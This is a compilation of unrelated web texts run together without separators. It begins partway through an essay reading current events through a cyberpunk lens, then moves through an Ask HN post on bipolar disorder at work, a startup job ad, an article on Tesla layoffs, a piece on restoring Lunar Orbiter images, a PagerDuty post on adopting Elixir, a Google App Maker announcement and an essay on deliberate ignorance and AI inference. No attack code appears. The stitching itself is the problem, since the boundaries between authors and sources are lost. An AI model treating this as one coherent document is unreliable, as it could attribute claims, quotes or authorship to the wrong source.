But perhaps you’ve also noticed that cyberpunk plot points are turning up in real life. Robot security guards patrol shopping malls. A near-billionaire startup founder sees virtual reality as salvation for the downtrodden global poor. San Francisco’s Tenderloin district is flush with VC money and homeless drug addicts at the same time. And speaking of those vigilante hackers, they’re here in our reality too, pwning companies of all sizes. Some state-sponsored ones like to meddle in foreign politics. It’s all very exciting! Only plutocrats and nouveau mafiosos can avoid feeling uneasy.

Cyberpunk examines the way computing changes power relationships. Asymmetric information warfare has become the norm, as foretold by our pulpy sci-fi prophets. The technological changes that have been snowballing over the past fifty years now mean that anyone can talk to anyone, anywhere, with their identity hidden or not. Edward Snowden can stroll away from his NSA job with a priceless cache of secret documents that detail the crimes of an empire, then escape across continents in a matter of days, to hole up with a rival regime.

So, why bother with any of this if you don’t intend to commit espionage?

A Suspicious Lens

Elements of our reality correspond to elements of fictional ones, sure. But I’m not saying that we live in a cyberpunk world. Rather, we live in a world that can be productively viewed through a cyberpunk lens. The difference is subtle but important — cyberpunk is the map, not the territory. I look at it as a mental model with which to interpret the near-past and near-future.

As Susan Sontag describes:

“[T]aste governs every free — as opposed to rote — human response. Nothing is more decisive. There is taste in people, visual taste, taste in emotion — and there is taste in acts, taste in morality. Intelligence, as well, is really a kind of taste: taste in ideas. […] Taste has no system and no proofs. But there is something like a logic of taste: the consistent sensibility which underlies and gives rise to a certain taste.”

Cyberpunk is a type of “taste in ideas” that weds aesthetics with politics. It is not a framework with a specific hypothesis or clearly defined rules. Rather, cyberpunk is an assemblage of loosely related themes, tropes, and aesthetics. Viewing the arc(s) of history through this cyberpunk lens helps highlight certain trends as being worth paying attention to. Noticing the moments of techno-dystopia in our world can jolt people awake, causing them to realize how computing — especially the internet — is impacting their lives on every scale.

The events or ideas that trigger the mental switch-flip are usually exotic, like crime-deterring robots, but the deeper level of using the cyberpunk mental model is looking at mundane things like commerce and subculture formation and seeing how computers and the internet change the dynamics that we used to be used to.

Tech-biz analyst Ben Thompson wrote on his blog, in 2013:

“[I]f there is a single phrase that describes the effect of the Internet, it is the elimination of friction. [¶] With the loss of friction, there is necessarily the loss of everything built on friction, including value, privacy, and livelihoods. […] Count me with those who believe the Internet is on par with the industrial revolution, the full impact of which stretched over centuries. And it wasn’t all good. Like today, the industrial revolution included a period of time that saw many lose their jobs and a massive surge in inequality. It also lifted millions of others out of sustenance farming.”

Our new technologies have fractal effects that can be observed on global levels, societal levels, and individual levels. Consider the environmental effect of high-tech manufacturing; consider conflict minerals going into so many laptops; consider the effect the ubiquity of smartphones has on geopolitical discourse; on national discourse. Consider where the American stock market would be without big tech companies. Consider where you would be.

Asymmetric Seismic Upheaval

Let’s say you’ve been observing the United States election. Whether you want to or not, you probably haven’t been able to escape this topic entirely. And let’s say you’re worried about “white genocide”. Next step: start a pseudonymous Twitter account.

“Neil [Turner]’s profile picture was a pouty mirror selfie of a skinny white kid, wearing what was clearly a Photoshopped ‘Make America Great Again’ hat. The self-proclaimed warrior against #PoliticalCorrectness and #WhiteGenocide claimed to be from Mississippi, maintained a healthy 20-something-thousand followers and had been mentioned in publications like Fortune for his hateful, white supremacist commentary on Twitter. But most notably, he was often the first to reply to tweets from Donald Trump and Hillary Clinton — a historically coveted, high-exposure spot in online social networks and comments sections.”

Spoiler alert: he used a bot to automate responses. This is very cyberpunk. Whoever “Neil Turner” really is, he brilliantly leveraged computing to take advantage of presidential candidates’ publicity. Now instead of being just another Twitter troll, ignored by most, he has thousands and potentially millions of eyes on his thoughts.

Activists in other political conflicts have also used the ubiquity of digital technologies to flip or push back on analog power differentials. Mahmoud Salem, a participant in Egypt’s 2011 Arab Spring uprising, wrote in World Policy Journal:

“Blogs become a means for mass protest. Facebook fuelled further organization, and with the advent of Twitter in 2007, protesters could communicate and document their often-tumultuous journeys in 140-characters or less. In short, by January 2011 there was a well-established network of tools for revolutionaries to employ in their struggle to modernize Egypt.”

America’s #BlackLivesMatter movement has flourished on social media. Their grievances have been substantiated as video after video circulates on various platforms, putting extrajudicial police killings on a loop for an audience of all races. Protest organizing takes place via hashtag and DM. Twitter in particular is a hotspot because of its public nature, but Philando Castile’s girlfriend Lavish Reynolds livestreamed him bleeding out on Facebook.

Of course, large institutions have access to the same tools. A company called Geofeedia harvested data from social media sites to help police pinpoint protesters. Facebook, Instagram, and Twitter cut off Geofeedia’s API access, but Geofeedia was not the only tool of its kind. Facebook itself took down the video of Castile’s ordeal, then claimed this action was a “glitch” after being widely chastised.

How many videos has Facebook removed that were then forgotten for lack of public outcry?

Protesters’ advantage is their ability to take over the news cycle, simultaneously in every part of a given country, because the internet means information travels instantaneously. Many of us have smartphones that ding us every time something new develops. “Did you see… ?!”

But the police and other fiat institutions have the same advantage they’ve always had — the ability to lock people up, sometimes justified but often not. What’s new to the law enforcement arsenal is being able to sort and target high-impact targets at scale.

A project by Georgetown Law’s Center on Privacy & Technology recently released “Perpetual Line Up”, a report on US law enforcement’s massive facial recognition databases, noting that “at least five major police departments — including agencies in Chicago, Dallas, and Los Angeles — either claimed to run real-time face recognition off of street cameras, bought technology that can do so, or expressed a written interest in buying it.”

A less political example is the infamous saga of Silk Road, a libertarian “Dark Web” drug marketplace run by a man who called himself Dread Pirate Roberts. Investigative journalist Joshuah Bearman chronicled Silk Road’s rise and fall for Wired, and it’s a remarkable story.

For years, Ross Ulbricht (DPR’s real name) was able to hide his various whereabouts by using the anonymous web browser Tor (which is ironically mainly funded by the US government) and bitcoin; he could run his platform remotely without ever outing his legal identity. Eventually an IRS agent working with the FBI found the clue that unraveled Ulbricht’s anonymity, by combing through old forum postings, cross-referencing usernames. When he first launched Silk Road and wanted to promote the marketplace, Ulbricht made the mistake of using a handle that could be tied back to him.

Again, see the interplay of power: an individual enables anonymous drug smuggling through the legal mail, and the government uses its manpower to comb through the digital detritus this individual was not savvy enough to hide.

Of course, these kinds of power gradients are not unique to a world with computers. Activists and the police using social media to fight each other is not so different from communist pamphlets and leftist magazines, met with McCarthyism and calculated subversion. (Take a look at the CIA’s ties to the Iowa Writers Workshop, or the FBI’s interference with the Black Panthers.) The story of Ross Ulbricht’s capture has parallels to 1920s and ‘30s gangster-hunts, or efforts to round up New York mob families throughout the twentieth century.

However, the world with computers makes it easier. What computers are really good at is brute-force math and copying things perfectly. They do those things very, very quickly. A few simple capabilities have been built up into myriad programs, and ultimately programmers’ work has transformed our everyday lives.

Tradeoffs of the Cognitive Underbelly

The cyberpunk mental model has a lot of predictive power because it heavily weights the influence of computing, but it can be risky because it’s quite cynical and pessimistic. We expect the worst of people. Cyberpunk is not an outright basilisk, but it can drive the mind toward paranoia. I’ve received some perturbing emails.

Fundamentally, the danger is that mental models are the enemy of complexity. They’re useful as sources of decision-making heuristics, shortcuts that guide you in reacting to new developments. This is just a thing that human brains need because contemplating every single occurrence and choice in depth is mentally taxing.

The internet enables more individual opportunity than ever before — how would my words manage to reach you otherwise? And the internet is more meritocratic than the landscape it took over, because anyone can distribute their own work to a potential audience of millions, but of course age-old power dynamics can’t be erased in one fell swoop. It also enables winner-take-all businesses, like Amazon’s dominance in ecommerce and Facebook’s reign over news media.

These companies obviously aren’t pure monopolies with no competitors at all, but they have massive and ever-increasing mindshare (hence wallet-share as well). Their overwhelming advantage comes from the way the internet has upended distribution — any company can reach any person. Like Ben Thompson said, the friction is gone. Hence a given company’s addressable market is limited only by old-world logistics (e.g. getting people online, hence initiatives like Zuckerberg’s much-maligned Internet.org, or Google’s dilemma in being unable to bypass China’s Great Firewall).

When your audience is the whole world, the flip side is that each consumer can choose whoever they want. They choose the highest quality — Google — or the most convenient — Amazon — or the one with network effects — Facebook. And that leads to One Giant Winner who amasses lots of power. On balance, it’s usually a good thing, but that doesn’t mean there are no negative effects.

Globalization in general has incensed a demographic close to home, as Nils Gilman chronicled for The American Interest:

“For the traditional working classes, gone are not only jobs but also the wellsprings of traditional forms of social esteem, replaced with a blighted landscape of deindustrialization, drug addiction, and elite disdain. To be sure, African-Americans have been experiencing this sort of social devastation forever; what is new is whites experiencing the same, while at the same time being denied the traditional consolation prize of elite-sanctioned ethno-racial supremacism.”

Economic upheaval always has profound cultural effects. Cyberpunk highlights the power of vigilante hackers, sure, but it also points to the power of institutions, whether stultified or moving fast and breaking things. The balance between these two types of entities is what’s fascinating and crucial to watch.

Ask HN: Bipolar is affecting my performance badly. Should I tell my employer?

This is a difficult topic to talk about. Sadly, many people do not even talk, and many with bipolar disorder commit suicide.

I know what it is to be in the dark cycle of bipolar. Last week, some personal issues triggered me to go from highly optimistic to extremely pessimistic.

I don't know how to tell my employer that my mind is on another planet right now. I might lose my job since it has been 4 days I do not work (2 sick, 2 because of this).

The company is based in the US but fully remote. I am under a contract (and I am not a US citizen). While values and culture are something that seemed to be important, recent weeks have had lots of changes and drama inside, and I don't think anyone would be able to put themselves in my place.

I am burnt out. Personally and professionally. I am under therapy and well surrounded. But I just need a week break.

Last but not least, the company has an "unlimited vacation policy" and they say they force employees to go on vacation. In my last year, no one told me how or when. I think because of some internal problems (we need to ship fast and soon, or the company might go bankrupt) they forgot this, which is not helping.

Should I just ask for vacation in the middle of the fire that we have inside? (I would look terrible to my co-workers/team.) Should I disclose I have bipolar? If so, how?

I personally don't think anyone who is unfamiliar with bipolar disorder has any idea how hard life can turn. Even the most mundane task turns into hell.

Thank you

Tenjin (YC S14) is hiring for various engineering and marketing roles


The team at Tenjin is small but we are growing. All of us feel passionately about doing work that matters and our vision is to create a fundamental shift in the way mobile marketing is done throughout the mobile app industry. Working at Tenjin will provide you with many opportunities for growth and leadership in addition to working at the cutting edge intersection of data and mobile marketing. If you’re looking to work in an exciting environment with smart, talented people who value good people and good ideas, we’d like to talk to you.

We are reshaping the mobile marketing landscape by breaking down data silos and building up an integrated data platform to replace the disparate, a la carte services in use today. We manage mobile growth infrastructure for our clients, dynamically managing and organizing the deluge of data generated by mobile devices and marketing channels.

While remaining focused, driven and ambitious, we don’t take ourselves too seriously. We enjoy great food, great company, and great coffee (all of which are provided for free!). We believe everyone here at Tenjin has the ability to contribute great things and we enjoy learning from each other every day. Team players who are also self-directed achievers will enjoy the balance of flexibility and collaboration that is an important part of the work culture at Tenjin.

Tesla employees reveal how they were fired

Spencer Platt / Getty Images
Former Tesla employees told Business Insider they were caught off-guard when they learned they were being fired.
  • On Tuesday, Tesla said it was firing around 9% of its employees.
  • Former employees told Business Insider they were surprised by the layoffs.
  • In May, Musk said the company would restructure operations to boost profitability, though he didn't discuss specific layoff plans.


This week, Tesla is firing around 9% of its employees in an effort to cut costs and eliminate redundancies, CEO Elon Musk said in an email to employees he shared on Twitter.

The move came as a surprise to some employees, who told Business Insider they were given no advance notice about the possibility of being fired. During Tesla's first-quarter earnings call in May, Musk said the company would restructure operations to boost profitability. At the time, he said the company would review its third-party contractors, though he didn't discuss specific plans to lay off company employees.

One former employee thinks more layoffs are coming

A former Tesla Energy salesperson who asked not to be identified by name said her team received an email at 1 a.m. on Tuesday morning asking them to clear four hours in their schedule that day for a video conference. The video conference turned into a conference call with a human-resources employee and Brent Baldwin, the company's director of energy sales.

During the call, 250 people, including the energy sales employee's entire training class, learned they would be let go, and Baldwin apologized for having to fire salespeople who had hit their quotas, the former energy salesperson said. Despite the apology, the former energy salesperson said she and her training class were made to feel as if they had failed the company.

Musk said in an email on Monday that the company was laying off people now so that it would never have to do it again.

But the former employee said she believes this round of layoffs won't be the last.

"My theory is that this is the first wave. I don't think there will be enough business for the staff levels that they have," she said. "I would be scared to lose my job if I still had one."

The former employee started at Tesla in January and said she had to work nights and weekends to hit her quota while dealing with a shifting commission structure that made it more difficult to hit her goals.

"Honestly, since I started with this company it's been nothing but a disaster," she said.

The company broke promises more than once, she said, adding that she was not reimbursed for mileage, as promised, and never received any company apparel. Tesla also didn't mark out sales territory, so she would run into her coworkers in her region, she said.

In April, she said solar salespeople signed a new commission plan that would prevent them from receiving commissions at different stages in the sales process. Instead, they would only receive commissions at the end of the process. The former solar salesperson says she'll end up losing money she would have made under the old commission structure because she was fired before some of her clients had their installations completed.

"There's no way around it, they just got away with not having to pay people," she said.

Tesla did not immediately respond to a request for comment about her claims.

Employees were caught off-guard

Another employee, who worked in vehicle delivery and asked not to be identified by name, said he wasn't aware of the meeting that would lead to his firing before he came to work on Monday morning. An hour after he arrived at the office, two of his supervisors and a regional human-resources manager brought one of his colleagues into a conference room, putting the vehicle delivery employee on alert.

"It was a little odd to see three managers show up," he said.

Once his colleague left the conference room, she gathered her belongings and was escorted out of the building. The former delivery employee said he thought his colleague had been fired for performance reasons, but once he was called into the conference room, he said he realized his position was being eliminated.

He was given no advance notice of the meeting before Monday. For each of the prior two weeks, he had worked 60 hours over six days, he said.

He had worked for Tesla since 2015 and said that during his time at the company his team had to adjust to a sixfold increase in deliveries while being told to increase delivery speed. Despite the raised expectations, his team shrank from its original size.

"How are we understaffed and you're still letting 9% of employees go?" he said. "It boggled my mind."

A third employee, an engineer who still works at Tesla and asked not to be identified by name, said he discovered his manager had been fired after the manager didn't show up for a meeting on Tuesday. When a colleague of his attempted to email the manager, the email bounced back. He said he thinks they fired the wrong people.

"I think it was really squirrelly how they did it," he said.

If you've worked for Tesla and have a story to share, you can contact this reporter at mmatousek@businessinsider.com.


Earliest images of the moon were much better than we realised

Earthrise: An Earthrise over the moon’s horizon, taken by Lunar Orbiter 1 on August 24th 1966. Credit: NASA/LOIRP.

Fifty years ago, 5 unmanned lunar orbiters circled the moon, taking extremely high-resolution photos of the surface. They were trying to find the perfect landing site for the Apollo missions. The photos were good enough to blow up into 40 x 54 ft images that the astronauts would walk across looking for the best spot. After their use, the images were locked away from the public, because at the time they would have revealed the superior technology of the USA’s spy satellite cameras, from which the orbiters’ cameras were derived. Instead, the images released at the time were grainy and low resolution, deliberately degraded by NASA.

Earthrise difference: Comparison of the Earthrise image shown to the public in 1966 on top, and the restored image directly from the tape on the bottom. The bottom image was released in 2008, 42 years after it was taken. Credit: NASA/LOIRP.

These spacecraft were Lunar Orbiter I to V, and they were sent by NASA during 1966 and 1967. In the late 1960s, after the Apollo era, the data that came back on analog tapes was placed in storage in Maryland. In the mid 1980s the tapes were transferred to JPL, under the care of Nancy Evans, co-founder of the NASA Planetary Data System (PDS). The tapes were moved around for many years, until Nancy found Dennis Wingo and Keith Cowing. They decided the tapes needed to be digitised for future generations, and brought them to NASA Ames Research Center. They set up shop in an abandoned McDonald’s, offered to them as free space, and christened the place McMoon. The aim was to digitise these tapes before the technology used to read them disappeared, or the tapes themselves were destroyed.

The McDonald’s: The McDonald’s nicknamed McMoon, with the trademark skull and crossbones flag denoting the “hacker” methodology. Credit: MIT Technology Review.

The Lunar Orbiters never returned to Earth with the imagery. Instead, each Orbiter developed the 70mm film (yes, film) on board, then raster scanned the negatives with a 5 micron spot (200 lines/mm resolution) and beamed the data back to Earth using lossless analog compression, which had yet to be patented by anyone. Three ground stations on Earth, one in Madrid, another in Australia and the third in California, received the signals and recorded them on to magnetic tape. The tapes needed Ampex FR-900 drives to read them, a refrigerator-sized device that cost $300,000 to buy new in the 1960s.

FR-900: The FR-900 that was used to restore the old images. A mix of old and new equipment to get the images to modern PCs. Credit: MIT Technology Review.

FR-900 signed: The back of the first FR-900 has been signed by the people who brought the project to life, including Nancy Evans. Credit: MIT Technology Review.

The tape drive that they found first had to be restored, beginning with a wash in the former restaurant’s sink. The machine needed a custom-built demodulator to extract the image, an analog-to-digital converter, and a monitor connection to view what was happening. As the labelling system of the tapes had been forgotten, and documentation was not readily available, they had to hand-decode the coordinates on the tapes. They also had a big collection of parts from other FR-900s and similar designs. The spare parts were constantly needed to keep the recorder going; there was good reason that the format didn’t last for long.

Moon image reels: These are just some of the reels of moon images. They use this machine to hand-inspect the reels, mainly to figure out the coordinate labelling system. Credit: MIT Technology Review.

In order to read the tapes, the heads of the FR-900 apply a magnetic field to the tape, inducing a current that can be measured and run through the demodulator. This pulls out the image signal, which is then run through an analog-to-digital converter. The data is then processed on a computer using the custom system they set up. They wrote custom software that interfaced with Photoshop to link the relevant parts of the image together. The orbiters sent out each image in multiple transmissions, with each strip (one tin) making up part of the image. The software manages to link up the strips nearly seamlessly at the full potential resolution. The best of the images can show the lunar surface at a resolution of less than 1 m, much better than any other orbiter that has been there.

Tapes: The image shows the sheer number of tapes that the few images are stored on. Inside McMoon you can also see a sleeping bag some poor guy had to stay in. Credit: thelivingmoon.com.

They were huge files, even by today’s standards. One of the later images can be as big as 2Gb on a modern PC; with photos from top-resolution DSLRs only being about 10Mb, you can see how big these images are. One engineer said you could blow the images up to the size of a billboard without losing any quality. When the original NASA engineers printed off these images, they had to hang them in a church because they were so big. The images below give some idea of the scale. Each individual image when printed out was 1.58m by 0.4m.

NASA printing: This image shows the large thin strip images being laid out on the floor of a large room so the engineers could look for good landing spots. Credit: NASA.

NASA engineer: The image shows a NASA technician with a ream of photograph printouts used to assemble the overall image. Credit: NASA.

Orbiter IV was there to produce a single big image of the front side of the moon. In pictures taken between May 11-25, 1967, the Orbiter took a number of images that span the area from the north pole to the south pole and from the eastern limb to the western limb. The complete mosaic stretched 40 by 45 ft. The engineers laid it out on the floor, and all the observers, including the astronauts, had to take off their shoes and crawl over it. The images were so good, even at this size, that some astronomers used magnifying glasses. This giant image was the primary source used to select the sites for Orbiter V to photograph at higher resolution. The images taken by Orbiter V decided the exact locations for Apollo 11 to land.

Tsiolkovskiy Crater: The very prominent feature in this image is the Tsiolkovskiy Crater on the far side of the moon. Taken by Orbiter 3 on 19 February 1967. Credit: NASA/LOIRP.

Since 2007 the Lunar Orbiter Image Recovery Project has brought back 2000 images from 1500 analog tapes, including the first ever picture of an earthrise. As Keith Cowing said, “an image taken a quarter of a fucking million miles away in 1966. The Beatles were warming up to play Shea Stadium at the moment it was being taken.” To find more of those images go to their website, but I warn you those images are huge.

Elixir at PagerDuty


When PagerDuty was founded, development speed was of the essence—so it should be no surprise when we reveal that Rails was the initial sole bit of technology we ran on. Soon, limitations caused the early team to look around and Scala was adopted to help us scale up.

However, there’s a huge gap between Scala and Ruby, including how the languages look and what the communities find important; in short, how everything feels. The Ruby community, and especially the Rails subcommunity, puts a huge value on the developer experience over pretty much anything else. Scala, on the other hand, has more academic and formalistic roots and tries to convince its users that correctness trumps, well, pretty much anything.

It nagged me, and it looked like we had a gap in our tech stack that was hard to reconcile. Scala wasn’t likely to power our main site, and though we needed better performance and better scalability than Ruby and Rails could deliver, there was a very large gap and switching was cumbersome. There was also little love for the initial Scala codebase, as it quickly became apparent that writing clean and maintainable Scala code was hard, and some technology choices made scaling more difficult than anticipated.

When thinking about these issues in 2015, I let myself be guided by an old Extreme Programming practice, that of the System Metaphor. Given that I did some work in the telecommunications world, it wasn’t too far-fetched to look at PagerDuty like some sort of advanced (telco) switch: stuff comes in, rules and logic route and change it, and stuff goes out. As with any analogy, you can stretch it as far as you want (look at an incident as an open circuit), but for me, just squinting a bit and realizing that it was a workable metaphor was enough.

If you say “telecom” and “programming language,” you say “Erlang.” I looked at Erlang before but the language never appealed to me, and in the past, it never really hit the sweet spot in terms of the kinds of systems I was working on. This time, however, the “sweet spot” part seemed to hold, but still—a language that was based on Prolog, that got a lot of things backward (like mixing up what’s uppercased and what’s lowercased), felt like C with header files … that would be a hard sell.

So I parked that idea, went back to work, and forgot about it until I stumbled upon Elixir a month or two later. Now this was interesting! Someone with Ruby/Rails street cred went off, built a language on top of Erlang’s Virtual Machine: One that was modern, fast, very high level, had Lisp/Scheme-style macros, and still professed to be nice to users (rather than Ph.D. students).

Needless to say, it immediately scored the top spot on my “languages to learn this year” list and I started working through documentation, example code, etc. What was promised, held up—it performed above expectations both in execution as well as in development speed. And what’s more, developing in Elixir was sheer fun.

After getting my feet wet and becoming more and more convinced that this could indeed remove the need for Scala, be nicer to Ruby users, and overall make us go faster while having more fun, I started looking for the dreaded Pilot Project.

Introducing Elixir

Introducing languages is tricky. There’s a large cost involved with the introduction of new programming languages, although people rarely account for that. So you need to be sure. And the only way to be sure is, somewhat paradoxically, to get started and see what happens. As such, a pilot needs to have skin in the game, be mission-critical, and be complex yet limited enough that you can pull the plug and rewrite everything in one of your old languages.

For my team, the opportunity came when we wanted to have a “Rails-native” way to talk to Kafka transactionally. In order to ease the ramp-up for the MySQL-transaction-heavy Rails app, we wanted to build a system that basically scraped a database table for Kafka messages and sent it to Kafka. Though we knew this wasn’t really the best way to interact with Kafka, it did allow us to simply emit Kafka messages as part of the current ActiveRecord transaction. That made it really easy to enhance existing code with Kafka side effects and reason about what would happen on rollbacks, etc.

We opted for this project as our Elixir pilot—it was high value and the first planned Kafka messages would be on our critical notification path, but it was still very self-contained and would have been relatively easy to redo in Scala if the project failed. It doesn’t often happen that you stumble upon pretty much the perfect candidate for a new language pilot, but there it was. We jumped into the deep end and came out several weeks later with a new service that required a lot of tuning and shaping, but Elixir never got in the way of that.

Needless to say, this didn’t sway the whole company to “Nice, let’s drop everything and rewrite all we have in Elixir,” but this was an important first step. We started evangelizing, helped incubate a couple more projects in other teams, and slowly grew the language’s footprint. We also tried to hire people who liked Elixir, hosted a lot of Toronto Elixir meetups to get in touch with the local community, and—slowly but steadily—team after team started adopting the language. Today, we have a good mix of teams that are fully on Elixir, teams that are ramping up, and teams who are still waiting for the first project that will allow them to say, “We’ll do this one in Elixir.”

Elixir has been mostly selling itself: it works, it sits on a rock-solid platform, code is very understandable as the community has a healthy aversion towards the sort of “magic” that makes Rails tick, and it’s quite simple to pick up as it has a small surface area. By now, it’s pretty unlikely that anything that flows through PagerDuty is not going to be touched by Elixir code. This year, we’re betting big on it by lifting some major pieces of functionality out of their legacy stacks and into Elixir, and there are zero doubts on whether Elixir will be able to handle the sort of traffic that PagerDuty is dealing with in 2018. From initial hunch through pilot into full-scale production, it’s been a pretty gentle ride and some of us are secretly hoping that one day, we’ll only have to deal with Elixir code.

An article on Elixir would not be complete without a shout out to the community’s leadership, starting with Elixir inventor José Valim, whom I largely credit for the language’s culture. Elixir comes with one of the nicest and most helpful communities around, and whether on Slack, on the Elixir Forum, or on other channels like Stack Overflow and IRC, people are polite, helpful, and cooperative. Debates are short and few, and the speed of progress is amazing. That alone makes Elixir worth a try.

Want to chat more about Elixir? PagerDuty engineers can usually be found at the San Francisco and Toronto meetups. And if you’re interested in joining PagerDuty, we’re always looking for great talent—check out our careers page for current open roles.

Ask HN: How do you manage your manager?

114 points by singluere, 7 hours ago | 47 comments
One of the things that is not taught in university or talked about enough in our industry is managing your manager. I am asking this because I was recently asked by my manager not to give talks at really difficult-to-get-into industry events, despite getting an acceptance. While I like the company I work for, it seems the un-preached way of managing the manager is to have a thick skin. How true is this? I'm also curious to know how you manage your manager?


App Maker, Google’s low-code tool for building business apps, comes out of beta


It’s been a year and a half since Google announced App Maker, its online tool for quickly building and deploying business apps on the web. The company has mostly remained quiet about App Maker ever since and kept it in a private preview mode, but today, it announced that the service is now generally available and open to all developers who want to give it a try.

Access to App Maker comes with any G Suite Business and Enterprise subscription, as well as the G Suite for Education edition. The overall idea here is to help virtually anybody in an organization — including those with little to no coding experience — build their own line-of-business apps based on data that’s already stored in G Suite, Google’s Cloud SQL database or any other database that supports JDBC or that offers a REST API (though that’s obviously a bit more of an advanced operation).


To do this, App Maker provides users with a low-code application development environment that lets you build applications through a straightforward drag and drop environment. Though it takes a bit of work to set up the database connectivity, once that’s done, the actual design part looks to be pretty easy — and thanks to a set of responsive templates, those final applications should work, no matter whether you are on a phone or desktop.

While many applications will likely rely on a database, it’s worth noting that developers can access Gmail, Google Calendar, Sheets and other data sources as well. In total, App Maker offers access to 40 Google Services. Unlike other low-code services like Mendix, K2 or even Microsoft’s PowerApps tools, Google’s App Maker seems to focus mostly on Google’s own services and doesn’t offer built-in connectivity with third-party services like Salesforce, for example. Chances are, of course, that now that App Maker is out of preview, Google will start adding more functionality to the service.

In an age of all-knowing algorithms, how do we choose not to know?


After the fall of the Berlin Wall, East German citizens were offered the chance to read the files kept on them by the Stasi, the much-feared Communist-era secret police service. To date, it is estimated that only 10 percent have taken the opportunity.

In 2007, James Watson, the co-discoverer of the structure of DNA, asked that he not be given any information about his APOE gene, one allele of which is a known risk factor for Alzheimer’s disease.

Most people tell pollsters that, given the choice, they would prefer not to know the date of their own death—or even the future dates of happy events.

Each of these is an example of willful ignorance. Socrates may have made the case that the unexamined life is not worth living, and Hobbes may have argued that curiosity is mankind’s primary passion, but many of our oldest stories actually describe the dangers of knowing too much. From Adam and Eve and the tree of knowledge to Prometheus stealing the secret of fire, they teach us that real-life decisions need to strike a delicate balance between choosing to know, and choosing not to.

Move slower?: Silicon Valley culture celebrates fast experimentation, which may not be what we want for our personal data. Credit: Frederic Legrand - COMEO / Shutterstock.com

But what if a technology came along that shifted this balance unpredictably, complicating how we make decisions about when to remain ignorant? That technology is here: It’s called artificial intelligence.

AI can find patterns and make inferences using relatively little data. Only a handful of Facebook likes are necessary to predict your personality, race, and gender, for example. Another computer algorithm claims it can distinguish between homosexual and heterosexual men with 81 percent accuracy, and homosexual and heterosexual women with 71 percent accuracy, based on their picture alone [1]. An algorithm named COMPAS (Correctional Offender Management Profiling for Alternative Sanctions) can predict criminal recidivism from data like juvenile arrests, criminal records in the family, education, social isolation, and leisure activities with 65 percent accuracy [2].

Knowledge can sometimes corrupt judgment, and we often choose to remain deliberately ignorant in response.

In each of these cases, the nature of the conclusion can represent a surprising departure from the nature of the data used (even if the validity of some of the results continues to be debated). That makes it hard to control what we know. There is also little to no regulation in place to help us remain ignorant: There is no protected “right not to know.”

This creates an atmosphere where, in the words of Facebook’s old motto, we are prone to “move fast and break things.” But when it comes to details about our private lives, is breaking things really what we want to be doing?

Governments and lawmakers have known for decades that Pandora’s box is sometimes best left closed. There have been laws on the books protecting the individual’s right to ignorance stretching back to at least the 1990s. The 1997 European Convention on Human Rights and Biomedicine, for example, states that “Everyone is entitled to know any information collected about his or her health. However, the wishes of individuals not to be so informed shall be observed.” Similarly, the 1995 World Medical Association’s Declaration on the Rights of the Patient states that “the patient has the right not to be informed [of medical data] on his/her explicit request, unless required for the protection of another person’s life.”

Writing right-to-ignorance laws for AI, though, is a very different matter. While medical data is strongly regulated, data used by AI is often in the hands of the notoriously unregulated for-profit tech sector. The types of data that AI deals with are also much broader, so that any corresponding laws require a broader understanding of what a right to ignorance means. Research into the psychology of deliberate ignorance would help with designing right-to-ignorance laws for AI. But, surprisingly, the subject has long been neglected as a topic of rigorous scientific inquiry, perhaps because of the implicit assumption that deliberately avoiding information is irrational.

Recently, though, the psychologist Ralph Hertwig and legal scholar Christoph Engel have published an extensive taxonomy of motives for deliberate ignorance. They identified two sets of motives, in particular, that have a particular relevance to the need for ignorance in the face of AI.

The first set of motives revolves around impartiality and fairness. Simply put, knowledge can sometimes corrupt judgment, and we often choose to remain deliberately ignorant in response. For example, peer reviews of academic papers are usually anonymous. Insurance companies in most countries are not permitted to know all the details of their clients’ health before they enroll; they only know general risk factors. This type of consideration is particularly relevant to AI, because AI can produce highly prejudicial information.

The second set of relevant motives covers emotional regulation and regret avoidance. Deliberate ignorance, Hertwig and Engel write, can help people to maintain “cherished beliefs,” and avoid “mental discomfort, fear, and cognitive dissonance” [3]. The prevalence of deliberate ignorance is high. About 90 percent of surveyed Germans want to avoid negative feelings that may arise from “foreknowledge of negative events, such as death and divorce,” and 40 to 70 percent also do not want to know about positive events, to help maintain “positive feelings of surprise and suspense” that come from, for example, not knowing the sex of an unborn child [4].

We’ve been giving our data away for so long that we’ve forgotten it’s ours in the first place.

These sets of motives can help us understand the need to protect ignorance in the face of AI. The AI “gaydar” algorithm, for example, appears to have close to zero potential benefits, but great potential costs when it comes to impartiality and fairness. As The Economist put it, “in parts of the world where being gay is socially unacceptable, or illegal, such an algorithm could pose a serious threat to safety.” Similarly, the proposed benefits of an ethnicity detector currently under development at NtechLab seem to pale in comparison to the negative impact on impartiality and fairness. The use of the COMPAS recidivism prediction software has a higher accuracy than a human but, as Dressel and Farid write, is “not as accurate as we might want, particularly from the point of view of a defendant whose future lies in the balance” [2]. Algorithms that predict individual life expectancy, like those being developed by Aspire Health, are not necessarily making emotional regulation any easier.

These examples illustrate the utility of identifying individual motives for ignorance, and show how complex questions of knowledge and ignorance can be, especially when AI is involved. There is no ready-made answer to the question of when collective ignorance is beneficial or ethically appropriate. The ideal approach would be to consider each case individually, performing a risk-benefit analysis. Ideally, given the complexity of the debate and the weight of its consequences, this analysis would be public, include diverse stakeholder and expert opinions, and consider all possible future outcomes, including worst-case scenarios.

That’s a lot to ask—in fact, it is probably infeasible in most cases. So how do we handle in broad strokes something that calls for fine shading?

One approach is to control and restrict the kinds of inferences we allow machines to make from data that they have already collected. We could “forbid” judicial algorithms from using race as a predictor variable, for example, or exclude gender from the predictive analyses of potential job candidates. But there are problems with this approach.

First of all, restricting the information used by big companies is costly and technically difficult. It would require those companies to open-source their algorithms, and large governmental agencies to constantly audit them. Plus once big data sets have been collected, there are many ways to infer “forbidden knowledge” in circuitous ways. Suppose that using gender information to predict academic success was declared illegal. It would be straightforward to use the variables “type of car owned” and “favorite music genre” as a proxy for gender, performing a second-order inference and resting the prediction on proxies of gender after all. Inferences about gender may even be accidentally built into an algorithm despite a company’s best intentions. These second-order inferences make the auditing of algorithms even more daunting. The more variables that are included in an analysis, the higher the chances that second-order inferences will occur.

The more radical—and potentially more effective—approach to protecting the right to ignorance is to prevent data from being gathered in the first place. In a pioneering move in 2017, for example, Germany passed legislation that prohibits self-driving cars from identifying people on the street by their race, age, and gender. This means that the car will never be able to inform its driving decisions—and especially the decisions it needs to take when an accident is unavoidable—with data from these categories.

Driver’s Ed: The website moralmachine.mit.edu tests human moral intuition in cases where machines will soon be making decisions, using data types of our own choosing. Credit: MIT

